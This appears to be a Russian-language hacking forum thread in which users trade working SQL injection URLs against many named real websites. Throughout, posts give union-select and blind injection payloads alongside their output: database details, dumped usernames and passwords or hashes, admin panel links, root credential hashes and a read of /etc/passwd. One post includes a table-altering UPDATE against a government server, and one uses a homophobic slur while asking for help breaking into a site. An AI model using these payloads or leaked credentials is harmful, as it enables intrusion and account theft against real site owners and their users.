http://www.energysavingworld.co.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
:) :) :)
парсим пока тепленькие а то не успеите, остынут

Mambo Component Material Suche 1.0
http://www.berufsvorbereitung-medien.org/index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),null,null,7,null,9,null,null,null ,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31/*
Сайтов с данной багой больше не нашел =/

вообшем скуль
http://www.newspress.fr/index.asp?lang='+or+1

db_name: newspress
sys_user :newspress_user
version:Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)


имена таблиц :

'ACCESPRESSE','addr','ADFP_CAT_IDS','ADFP_QUA_IDS' ,
'Adresse_Web','ALERT_COMM','algorithm','APPNAME',' ARCHIVEDON','ARGUS_CAT_IDS','ARGUS_TEM_IDS','auid' ,'backuplsn','BEGINDATE','bin_data','binary_messag e_body','bit_data','bitlength','bitposint','bitpos leaf','brkrinst','CARNET','CARTE_ID','CAT_ID','CAT _IDS','Categorie_Titre','CATID','CCLIC','CDAYS','C DISP','cert','Chaine','chk','USERS'

берем таблицу и подбираем имена столбцов (пример для таблицы лог):
http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+COLUMN_NAME+FR OM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='LOG'+AND+C OLU MN_NAME+NOT+IN+('addr','xxx',))--

найдя нужный столбец например addr выводим

http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)--

в поиске и использовании очень помогла статья [cash]
http://forum.antichat.ru/threadnav30501-1-10.html

Joomla Component Artist

http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9+from+jos_users/*
Три разных уязвимых параметра

Добавлено:
http://www.hanoiguesthouse.net/index.php?option=com_list&city=-1+union+select+1,2,3,concat(version()),5,6,7,8,9,1 0/*

http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=10080'

хостерЖ
elabhosting.com
http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT( AES_ENCRYPT(password,0x71),0x71),3,4+from+users+li mit+1,1/*

Таблицы и поля, которые я подобрал:
users
email
password
first_name
last_name
domains
server
id
name
А вот и адимн:

First Name: Wael
Last Name: Elkadi
pass: william
admin@elabhosting.com

да, чуть не забыл =)
буржуйский онлайн-магазинчик (австралийский)

_http://www.australianopenshop.com/category.php?id=99999+union+select+1,2,3,4,5,6,7,8 ,9,10,VERSION(),12/*

Версия мускула: 5.0.27-community-nt
Юзер: ausopen@netregis-8cuqdh
База: ausopen

смотрел таблицы, из достойных могу выделить только:
tblbilling
tblmember
tblorder
tblorderprod
tblsiteadmin
tbluser

moblog.co.uk
http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ ws(0x3a,username,password,email),4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9+from+mob_users+limit+5110,1/*
http://moblog.co.uk/forum
от форума
mat:bigmoney

4.0.27-standard
http://www.plantgeek.net/article_viewer.php?id=99999999999999+union+select+ 1,2,concat(version(),database(),user()),4,5,6,7,8, 9,1,2,3/*
4.1.22-log
http://www.valleys.ru/work.php?id=-9+union+select+1,2,database(),user(),5,6,version() ,8,9--
4.1.20-max-log
http://www.freepoc.org/viewapp.php?id=-1+union+select+1,version(),3,4,5,6,7,user()--
http://www.rabidhardware.net/index.php?profile=1'+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6+FROM+ INFORMATION_SCHEMA.TABLES/*

moblog.co.uk

http://moblog.co.uk/forum
от форума
mat:bigmoneyбаян =D
http://www.legal-info-legale.nb.ca/showpub.asp?id=(select+top+1+cast(username+as+nvar char)%2B%27%3A%27%2Bcast(password+as+nvarchar)+fro m+users)-- 'pleisadmin:s09ofk48f'
два раза вводить.

СПРАВИЗДАТ - ЖЕЛТЫЕ СТРАНИЦЫ

_http://www.spr.ru/view.php?id_firm=-22775'+union+select+1,concat(user,char(58),passwor d),3+from+mysql.user+limit+0,1/*

spraviz8_sam:*26F07D3B38B5FAC4BA063A5D76D2895C7331 9D78

www.resheto.ru

http://resheto.ru/photo/index.php?id=0x2d3127%20union+select+1,2,3/*

5.0.32-Debian_7etch1-log/resheto/resheto@ftp01.awax-hosting.ru
по рейтингу на маил в сотке)


http://thefamilyrecords.com/artists.php?artists_id=0x2d3127%20union+select+1,c oncat_ws(0x2F,version(),database(),user()),3,4,5,6 ,7/*

5.0.24a-standard-log/family_records/family_records@apache2-twiddle.galaga.dreamhost.com

-------------------------------------------------------------
jokester просто красавчег) нету слов :) до сих пор в оуте)

Официальный сайт футбольного клуба "Металлург" Запорожье.
http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+passwd,2,3,login,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9+from+users/*

4.0.27-sta

Модератор-админ на форуме - Fidel:tura

wan-press.org
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user( ),database())/*
5.0.32-Debian_7etch1-logroot@localhostnewwan
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat(user,0x3,password)+fro m+mysql.user/*
debian-sys-maint:679ee92a1e5d19c1
pma_9HPasvZaPmz0:090e15576d4d4bd5
horde:1dedb445714a68b0
sitebuilder_db:1e4b1f810b9f14b8
rap21:521c428865968727
capetown2007:521c428865968727
pressfreedom:521c428865968727
conference:521c428865968727
newsletter:521c428865968727
newwan:521c428865968727
wan:521c428865968727
wdmt:521c428865968727
wef:521c428865968727
wpt:521c428865968727
root:521c428865968727
xmltospip:
tablemountain:521c428865968727
goteborg2008:18788a6d194a1517
admin:13ba13aa099ab4ac
Таблица с юзерами: front_users
Колонки: fuser_login, fuser_passwd, fuser_email
Не смог найти базу в которой эта таблица, через схему вывести не получилось, сцуко скрипт не дает.

Таблица с юзерами: front_users
Колонки: fuser_login, fuser_passwd, fuser_email
Не смог найти базу в которой эта таблица, через схему вывести не получилось, сцуко скрипт не дает.
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,FUSER_PASSWD,4+FROM+3may.Front_ users/*
Но они походу все пустые
Зато есть http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,concat(BUSER_LOGIN,0x3A,BUSER_P ASSWD),4+FROM+3may.Back_users/*
Login:3mayAdmin
Pass:Em&y6wan!

www.symbiant.org & www.reciprocity.cc

_http://www.symbiant.org/news.php?id=-6+UNION+SELECT+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7+from+users
_http://www.reciprocity.cc/news.php?newsid=-43+union+select+1,2,3,concat_ws(0x3a,username,pass word,admin),5,6+from+users

www.sex-shop.ro

http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,version(),5,6,7,8/*
4.1.20 /*но не стоит расстраиваться*/
http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,concat_ws(0x3a,login,p ass),5,6,7,8+from+user/*
mishu:dellinspiron1300

http://www.sex-shop.ro/admin/login.php
заходим и админим ;)

http://team-rs.ru/member.php?id=-4%2527+union+select+1,2,3,4,TABLE_NAME,6,user(),8, 9,0+FROM+INFORMATION_SCHEMA.TABLES/*

www.dominican.edu

http://www.dominican.edu/query/ncur/display_ncur.php?id=-2161+union+select+1,2,3,4,5,6,7,user(),database(), version(),11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 ,58,59,60,61,62,63,64,65,66,67,68.69,70,71,72,73,7 4,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 91,92,93,94,95,96,97,98,99,100,101,102,103,104,105 ,106,107,108,109,110,111,112,113,114,115,116,117,1 18,119/*
user() - DUOC_ONLINE@NACIO1
database() - dominican
version() - 5.0.26-log

http://borowiha.inetrus.ru/top/inf.php?sid='+union+select+id,pass,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+u sers+where+id=2/*
---
вот еще, но тут дальше расковырять не получилось.если у кого получится пишите в приват:
http://wap-top.ru/top/index.php?p=-1

и еще
http://kyky.biz/bibl/index.php?i=1&ver=xml&letter='+union+select+1,2,3,4,5/*

http://www.cz-usa.com/product_detail.php?id=159999999+union+select+1,2,V ERSION(),USER(),DATABASE(),6/*
VERSION:4.0.21

Официальный сайт веб-движка becontent. Очень мне понравилась его административная часть. На сайте есть ссылка на скачку, если изменить алгоритм хеширования с стандартного md5 на md5(md5($pass)) или добавить salt, вполне хороший движок.
А вот и сама уязвимость (банально) :

_http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
alfonso : pippo12
Доступ в административную часть я заблокировал, привелегии администратора снял, дабы небыло повторных дефейсов, как ето любят делать "неп0хеки".

СКРИН:
http://sqlinj.com/owned/becontent.gif

P.S. Профильтровать переменные, изменить алгоритм хеша, не ставить легкие пароли и работать с БД без file_priv отличный движок.
P.S.S Ссылка на скрине Не реклама!!!

http://www.kensybrowns.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
http://www.arok.dk/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
http://www.pinocchioclub.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
http://www.irmilano.it/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
http://www.maddenitalianleague.eu/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2

[HTML]http://www.radiyocristal.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1

меняем значение в переменной ID и смотрим хеш пасса любого юзверя
ЗЫ все для ачата

www.antioch-college.edu


http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,user(),version() ,database(),6,7,8,9,10,11,12/*

user() - acollege_colleg1@localhost
database() - acollege_college1
version() - 5.0.27-standard

http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,id,4,password,6, 7,8,9,10,11,12+from+users/*

id - 13
md5($password) - 97d735d01e2c3e9ba77719db119b8404
password - amaruyama

http://www.vergelijking.be/gsm/data.php?id=0x3127%20union+select+concat_ws(0x2F,v ersion(),database(),user())/*

5.0.32-Debian_7etch1-log/vergelijking/vergelijking@localhost


http://www.hubbardbrook.org/gis/data.php?id=0x3127%20union+select+1,2,concat_ws(0x 2F,version(),database(),user()),4,5,6,7,8/*

4.1.21-community-nt/hbr/hbr_admin@savanna.lternet.edu' in


http://www.dogrel.com/English/News/article.php?id=0x3127%20union+select+1,2,3,4,conca t_ws(0x2F,version(),database(),user()),6,7,8/*

4.1.21/DB_dogrel/dogrel@localhost


http://www.jdhindia.com/data.php?id=0x3127%20union+select+1,concat_ws(0x2F ,version(),database(),user())/*

4.1.22-standard-log/loejclsy_jdh/loejclsy_jdh@localhost


http://www.somborvaros.org/data.php?lang=sr&id=0x3127%20union+select+1,2,concat_ws(0x2F,versio n(),database(),user())/*

4.0.18/somborvaros/somborinfo@80.74.160.40

ЗЫ покопался и нашел еще
Малышу Билли посвящаетцо :D
часть 1
http://www.revistaoficialdoxbox.com.br/index.php?cat_id=-1012+union+select+1,2,concat(version(),0x3a,user() ,0x3a,database()),4,5/*

5.0.24-locaweb-log:xbox@200.234.201.120:xbox



http://stc.msn.com/br/gbl/lg/1/m/msft.gif

Это не единственная уязвимое место вот еще
часть2 =)
http://www.revistaoficialdoxbox.com.br/poll_results.php?pollid=2222'+union+select+1,conca t(version(),0x3a,user(),0x3a,database()),3,4/*

еще
http://revistaoficialdoxbox.tempsite.ws
===========================================

2 xcedz
www.dotfiles.com
баян
Замучали его бедного я раза три точно в этой ветке видел

>баян

антибоян не обновляется... а по всем страничкам лазить бред :d

Не парься, у всех бывает,а вообще :
google dotfiles.com site:forum.antichat.ru
7 ссылок

барыги какие то :D
http://www.sisco78dvd.com/store/index.php?cat_id=-1+union+select+version(),2,3,4,5,6,7,8/*
5.0.32-Debian_7etch1-log

таблички
http://www.sisco78dvd.com/store/index.php?cat_id=-1+union+select+table_name,2,3,4,5,6,7,8+from+infor mation_schema.tables+limit+1,100--
поле... русское поооооле - светит луна иле падает

http://www.sisco78dvd.com/store/index.php?cat_id=-1+union+select+column_name,2,3,4,5,6,7,8+from+info rmation_schema.columns+limit+1,100-- :D

http://www.alparysoft.ru/products.php?id=10&item=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-log/wtalparysoftru/wtalparysoftru@localhost

прошелся по туроператорам:

BSIgroup:

_http://www.bsigroup.ru/outgoing/specs.php?id=-464+union+select+1,version(),3,4,user(),6,7,8,9,10 ,11,12,13,database(),15,16,17,18,19,20,21,22,23,24 ,25,26,27/*&action=getItem

5.0.22
bsigroup_out
bsigroup_newwww@localhost
--------------------------
ВОЯЖ-ЛЮКС:

_http://voyag-lux.ru/chapter7.html?uid=7&vacid=-3+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( version(),char(58),user(),char(5

8),database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/*

4.1.10:root@voyage-luxe.aha.ru:voyage

доступ к mysql.user

_http://voyag-lux.ru/chapter7.html?uid=7&vacid=-3+union+select+1,2,aes_decrypt(aes_encrypt(passwor d,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18+from+mysql.user/*

18120c23686967de
1b873b97412ca664

блин как звать юзера не нашел спать пойду

http://www.kisantech.com/index.php?cat_id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3,4,5,6,7,8,9,10--

4.1.22-standard:shrikant_shrikan@localhost:shrikant_db

http://www.kram.se/butik/index.php?cat_id=6+union+select+version(),2,3,4,5, 6,7,8/*
4.0.27-standard

http://www.tokyogarage.ru/salon/?id=-126+union+select+1,2,login,password,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+users+limit+1 ,1/*
admin:c5867aba18ac3f84c6ca96bdc3731ac0
avv:067026f0c6e2164684867a79f48dc9fb:avv
ceba:7da8dd069dfc3ed8c0b2294591c0f889:byaka
где админка не знаю
-----------------------------------------------------
http://www.elenayavorskaya.ru/details.php?m=-109+union+select+1,password,login,4,5+from+admins/*
elena:123
http://www.elenayavorskaya.ru/partners/adm/login.php

2 159932

elena:123
пароль отсюда:
_http://www.elenayavorskaya.ru/admin/

2 159932

elena:123
пароль отсюда:
_http://www.elenayavorskaya.ru/admin/
прочитай ВНИМАТЕЛЬНО ! я написал что пас не подходит а админку я написал !
теперь подходит .. странно - глюки были ..

2 159932
Помоему мы на разных языках
Твой аккаунт подходит СЮДА:
_http://www.elenayavorskaya.ru/admin/

Обратите внимание на счетчик сайта ;)

http://www.theplace.ru/forum/message.php?id=-87910+union+select+1,2,3,concat(table_schema,0x3a, table_name,0x3a,column_name),5,6,7,8+from+informat ion_schema.columns+where+column_name+like+0x257061 737325+limit+0,1/*&top_id=87910

http://korea-dpr.com/users/russia/news/message.php?id=0x3127%20union+select+1,concat_ws(0 x2F,version(),database(),user()),3,4,5,6/*
4.0.24_Debian-10-log/russia/russia@localhost

http://www.trueyoga.com/page.php?ID=0x313527%20union+select+1,2,3,4,concat _ws(0x2F,version(),database(),user()),6/*
4.0.27-max-log/tydbu/tydbu@208.109.78.140

упс

http://www.classpad.org/details.php?id=-186+union+select+1,concat_ws(0x3a,customers_lastna me,customers_password,customers_id),3,4,5,6,7,8,9, 10,11,12,13,14,15,16+from+customers+limit+1,1/*&cat=5

Ппц ели додумалсо до это таблицы Ж(никогда бы ни подумал).Кому не лень,расшифруйте и скиньте в ЛС)))))))))))))))))))))))))))))))))))))))))))))) ))))))))))


Hallgren:6c7be71afc1a971cdc69e575fca701ec:02

2 Велемир limit+0,1 Denley:48b908cfdfea2575482eead693f6021f:7b:737
md5($salt.$password) если не ошибаюсь


http://www.sibezrcs.ru/uslugi.php?id=-1+union+select+1,name+from+articles+limit+1,1/*

ничего такого


ver 4.1.18
sibezrcs@fe27.hc.ru

Шоп)
_http://www.visionsp.co.uk/shop.asp?navcatid=-11+UNION+ALL+ SELECT%20null

sunnyborder.com
http://www.sunnyborder.com/pages/plant.php?id=290+union+select+concat(USER(),0x3a,V ERSION(),0x3a,DATABASE()),1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35/*
L1v91n1@localhost:4.1.12-log:sunnyborder
----------------------------------------------------------
onestops.info
http://www.onestops.info/category.php?cat_id=-10'+union+select+0,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),2/*
onestops@localhost:4.1.19-standard:onestops
----------------------------------------------------------
southphillyreview.com
http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE())+using+latin1)/*
philly_review@rp1:4.1.12-standard:philly_review_db
http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(id,email)+using+l atin1)+from+users/*
31mark@highermedia.com
----------------------------------------------------------
idahosystemofcare.org
http://www.idahosystemofcare.org/cal/month.php?cid=-3+union+select+0,1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7/*
idsoc@216.197.96.150:4.1.20-log:dbidsoc

sony--ericsson
_http://www.sony-ericsson.ru/catalog/phone.php?fam=24&idmodel=-101+union+select+1,version(),user(),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18/*&idkey=2&idparent=4
4.1.22
sonyeric_old@localhost

http://www.99brands.com/products.php?category_id=-21+union+select+1,2+from+orders/*
Нашел таблы products, categories дальше влом ковырять... Шоп по продаже часов, кажись online там есть партнерская программа типо главмеда...

Прошёлся по институтам:
-----------------------------------
Институт Морской Геологии и Геофизики г. Южно-Сахалинск

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user(),version(),databa se()/*

root@localhost
4.0.18-log
site

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user,password,4+from+my sql.user/*

root:059391cc0d366090
-------------------------------------
"Институт проблем предпринимательства" Питер
_http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,user(),version(),4,5/*

u12018@localhost
4.1.20

http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,name,pass,4,5+from+admin/*

montana 6faa499662c77a0b

Кому не лень попробуйте через order подобрать столбцы от 1 до 6, не пойму почему такой вывод.Вот рабочий параметр:

_http://www.ippnou.ru/article.php?idarticle=000282
--------------------------------------

Для любителей экстремального отдыха ;)


NASA:

https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=-1'
https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=3-1/**/or/**/1=@@version


Dr.Web:

http://old.antivir.ru/inf/virus.php?id=-31/**/union/**/select/**/1,2,3,4,5,6,7,8,9/*

к сведению

old.antivir.ru has address 81.176.66.227
Found 16 websites with the IP 81.176.66.227

1) adinf.com
2) adinf.ru
3) antigen.ru
4) antimonov.ru
5) antivir.ru
6) devicelock.ru
7) dialog-nauka.ru
8) dialognauka.com
9) dialognauka.ru
10) dials.ru
11) ftp.adinf.ru
12) ftp.antivir.ru
13) ftp.dialognauka.ru
14) ftp.dials.ru
15) new.antivir.ru
16) old.antivir.ru

interrus@localhost
virus
4.0.22-log

PS: "Данный файл был обнаружен где-то в недрах
гугла и по запросу, который уже никто не помнит )). Мы не можем быть признаны
ответственными за его распространение, так как он был найден через общедоступную
поисковую систему. Вы могли быть на нашем месте ))." // (c) defaced 3 // :rolleyes:

Сайт управления федеральной налоговой службы по Брянской области =) :
http://www.r32.nalog.ru/index.php?topic='+union+select+1,2,3,4,5,6,7,8,9/*
p.s. по ходу дела отключен вывод ошибок

http://search.adslclub.ru/?show_dir=1&id=0&id_res=-6+union+select+1,2,3,4,5,6,7,8,9/*
Если кто-то сможет этим воспользоваться, напишите пожалуйста в личку)

www.spelbord.nl

http://www.spelbord.nl/categorie.php?cat=-17+union+select+1,2,user(),4,5,6,7,8,9/*

user() - spelbo00_spel@localhos
database() - spelbo00_spel
version() - 4.1.20-standard

Для любителей экстремального отдыха ;)


NASA:

https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=-1'
https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=3-1/**/or/**/1=@@version

good .

https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=-1'

Table : ichty_help

Colunm : Title

Update : https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=1+update+ichty_help+set+title='Text';--

Good.

Господа, кому нужна хоумпага рекомендую-Разработчики веб-сайтов:
--------------------------------------
"NT-Design" Москва
_http://www.ntdesign.ru/newsit.php?id=-58+union+select+1,version(),3,user(),database()/*&curr=1

5.0.24a-community-nt-log
sintde1gb_
1gb_ntdesign@10.0.1.17
---------------------------------------
"WEB outsourcing" Москва

_http://www.wos.ru/rus/about/news/show.php?id=-4+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er(),char(58),database(),char(58),@@version),0x71) ,0x71)/*

wos@fe10.hc.ru:wwwwosru:4.1.22
----------------------------------------
И ПЕРВОЕ МЕСТО:
"АТИКС" Екатеринбург

Никаких фильтров:
_http://www.atiks.org/index.php?news_id=-99+union+select+1,2,version(),user(),5,6,7/*

Работа под рутом:
5.0.20a-nt-log
root@localhost

_http://www.atiks.org/index.php?news_id=-99+union+select+1,2,user,password,5,6,7+from+mysql .user/*

И гвоздь программы суперсложный пароль:
root
19fc91902bb86674=adidas

В списке клиентов 74 компании(копаться не стал, даже не интересно)

admin:c5867aba18ac3f84c6ca96bdc3731ac0
avv:067026f0c6e2164684867a79f48dc9fb:avv
ceba:7da8dd069dfc3ed8c0b2294591c0f889:byaka
где админка не знаю
-----------------------------------------------------

elena:123
http://www.elenayavorskaya.ru/partners/adm/login.php
а шел залить случайно не получилось? :)

Помогите сломать сайт пидоров:
http://www.gaycentral.ru/news/?id=-30+union+select+1,database(),3,user(),VERSION(),6, 7,8,9,10,11/*

ultras.kiev.ua
http://ultras.kiev.ua/index.php?id=-1+union+select+1,2,3,4,version(),6+from+ibf_member s_converge/*
4.0.27
http://ultras.kiev.ua/index.php?id=-1+union+select+1,2,concat_ws(0x3a,converge_email,c onverge_pass_hash,converge_pass_salt),4,5,6+from+i bf_members_converge/*
edelweiss88@gmail.com:42a14a7951758678e3caf18fbec7 f1de:v62We мыло:хэш:соль
http://ultras.kiev.ua/index.php?id=-1+union+select+1,2,count(converge_email),4,5,6+fro m+ibf_members_converge/*
135 юзеров

Сайт Торпедо Усть-Каменогорска.

_http://www.ustinka.com/news.php?id_news=187
_http://www.ustinka.com/news.php?id_news=187+order+by+7
_http://www.ustinka.com/news.php?id_news=-187+union+select+1,2,3,4,5,6,7
_http://www.ustinka.com/news.php?id_news=-187+union+select+1,2,3,database(),user(),version() ,7
4.1.22-standard-log
ustinka_main@localhost
ustinka_main20060924
_http://www.ustinka.com/news.php?id_news=-187+union+select+1,2,3,database(),user(),version() ,7+from+user
_http://www.ustinka.com/news.php?id_news=-187+union+select+1,2,3,4,concat(pass,char(58),name ),6,7+from+user

Тима:uk
Евгений:tevb7
test:test
Саня:GsV
Алексей:sdfret5
Roman Kashcheyev:6ez3zb
Слава:kh91b
:r59f4
Алексей:ssdwqa
Sergei Kvitkin:gsreh3
Юрий Пигарев:25z23d
Петр:j37h
Тим:lskjue
Марат:prudzm
:dbahn
:755773
:amina3.5
:477554
Форумную таблицу найти не смог.

2 Велемир limit+0,1 Denley:48b908cfdfea2575482eead693f6021f:7b:737
md5($salt.$password) если не ошибаюсь




Сорь за оффтоп,а

6c7be71afc1a971cdc69e575fca701ec:02

тоже соль?:РРРРРР

ekran.biz
pr=4/10
тиц=80

http://www.ekran.biz/index.php?oid=7'+/*!40024+and+ascii(lower(substring(version(),1,1)))>51*//*

Хотите виллу!?
www.azurvilla.nl
pr=3/10
http://www.azurvilla.nl/french_real_estate_agent_france/index.php?oid=-1+union+select+convert(concat(user(),0x20,database (),0x20,version())+using+latin1),2,3,4/*

"Помощь в продвижении сайтов. О Вас узнают все."
seoproduction.com
pr=1/10
http://www.seoproduction.com/index.php?pr=1&id=1+and+ascii(lower(substring(version(),1,1)))>51+/*&page=-1
http://www.seoproduction.com/index.php?pr=1&id=-1+union+select+1+/*&page=-1 --не выводится :-(

www.rabota2000.com.ua
5ая ветка мускуля + пару вкусностей...
http://www.rabota2000.com.ua/vacancyview.php?n=-656334 UNION SELECT 1,2,CONCAT_WS(0x203A20,Host,User,Password,File_pri v),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23 FROM mysql.user/*localhost : root : 60be6b990356d82f : Y
178612.ds.nac.net : root : : Y
178612.ds.nac.net : : : N
localhost : : : N

http://www.rabota2000.com.ua/vacancyview.php?n=-656334 UNION SELECT 1,2,LOAD_FILE(0x2F6574632F706173737764),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*/etc/passwd


www.priem.tsure.ru
http://www.priem.tsure.ru/?section=profession&click=1&div=-1) UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()), 3,4-- fff4.1.22 : priem@localhost : priem


www.comodoro.gov.ar
http://www.comodoro.gov.ar/nodo.php?seccion=6&nodo=-102' UNION SELECT 1,CONCAT_WS(' : ',VERSION(),USER(),DATABASE()),3,4,5,6,7/*5.0.22 : comodoro_nodos@192.168.0.51 : com_contenido

http://art.dn.ua/news_one.php?news_id=1+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26/*
----------------------------------------
citysite
4.0.16
csuser@localhost.localdomain
----------------------------------------
таьлицы не нашел. Кто найдет-отпишитесь

http://www.ezytrip.com/webboard/show.php?id=-297+union+select+1,DATABASE()/* - ezytrip_1
http://www.ezytrip.com/webboard/show.php?id=-297+union+select+1,version()/*- 5.0.37-standard
http://www.ezytrip.com/webboard/show.php?id=-297+union+select+1,COLUMN_NAME+FROM+INFORMATION_SC HEMA.COLUMNS+limit+1+offset+1/*-DEFAULT_COLLATE_NAME
http://www.ezytrip.com/webboard/show.php?id=-297+union+select+1,TABLE_NAME+FROM+INFORMATION_SCH EMA.TABLES+limit+1+offset+1/*- COLLATIONS
http://www.ezytrip.com/webboard/show.php?id=-297+union+select+1,user()/* - ezytrip_b@localhost



http://belexpocentr.ru/show.php?id=-89+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,database(),user()/*

version-- 5.0.44
database --www_belexpocentr_ru
user -- belexpocentr@localhost

_http://www.job4good.com/jobfind.php?action=search&cmdSearch=%20%20Search%20%20&jids[]=00&kwd=&lids[]=-500+union+select+version()/*

http://eng.sistema-hals.ru/main.phtml?pid=3&addpid=-12'+union+select+concat_ws(0x3a,name,password%20%2 0%20)+from+users/*&nid=706&special=news
никак не могу в админку зайти

мммммдаааааа
прикольная штука:
Система управления сайтом
Hacker? He-he :) :p



Ребята подксажите как узнать низвания таблиц ну и все остальное ПЛИЗ
вот линк
_http://www.umpcportal.com/products/product.php?id=-162+union+select+user(),database(),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,version() ,25,26,27,282,9,30,31,32,33,34,35,36,37/*

#######sql_inj#######
http://www.anba.com.br/ingles/noticias.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database())/*
---------------info---------------
4.0.27-LOCAWEB-LOG:ANBA@200.23
#######sql_inj#######
http://www.barrichello.com.br/equipe.php?l=-999+union+select+1,concat(version(),0x3a,user(),0x 3a,database())--
---------------info---------------
5.0.41--log:barrichello@200.234.200.44:barrichello

http://www.atempo.com.tr/index.php?id=-442+union+select+1,user(),3,database(),5,6,7/*
user=atempoc_aboo@localhost
database=atempoc_atempo
varsion=4.0.26-log

http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
